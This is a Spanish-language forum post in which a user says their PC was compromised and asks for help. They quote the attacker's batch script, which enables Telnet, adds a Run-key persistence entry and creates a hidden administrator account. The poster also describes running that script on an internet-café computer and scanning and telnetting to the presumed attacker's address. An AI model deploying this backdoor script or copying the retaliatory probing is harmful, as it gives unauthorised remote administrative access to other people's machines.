hola mi problema es el siguiente espero y me hayuden ...
El dia de hoy desperte muy tranquilamente.....entonces prendi la pc y que raro? habia un nuevo usuario? se llamava gorth...quien sabe quien que es ?? bueno el problema es que fui hackeado.... jumm jumm.. y esa personita ya tiene acceso a mi pc cuando quiera de echo hasta hizo su propio usuario¡¡ nimodos..
aaa pero jaja que risa el dejo un rastrotote dejo un .txt con lo sig:
@echo off de el bat
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f de el bat
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d ruta de el bat /f de el bat
net user usuario password /add de el bat
net localgroup "Administradores" usuario /add de el bat
tlntadmn config port = 23 de el bat
exit de el bat
mmmm esto me hizo recordar que un disque amigo de la school me emvio un .bat
lo que hice fue guardar el .txt y pasarlo a bat. para instalarlo en un cyber haber que pasa?? y sucedio lo mismo ahora..el problema es el sig no puedo eliminar su usuario¡¡¡ ya lei lo que dejo y la clave es usuario ya entre..pero no puedo eliminarlo solo cambie la contraceña¡¡¡ pero bueno.... ese es mi problema..
y me dejo su numero ip..jaja ya lo tengo...192.168.1.64 le di ping..y perdidos=0
mm...escanie sus puertos y el mas frajil es 2105 pero...al darle telnet desde el ms-dos no se puede¡¡¡ sale el ms-dos en negro y escribo y no se ve nada?? por que??
de antemano gracias

Autor

siempre se aprende algo, por eso reviso de ves en cuando mensajes como stos...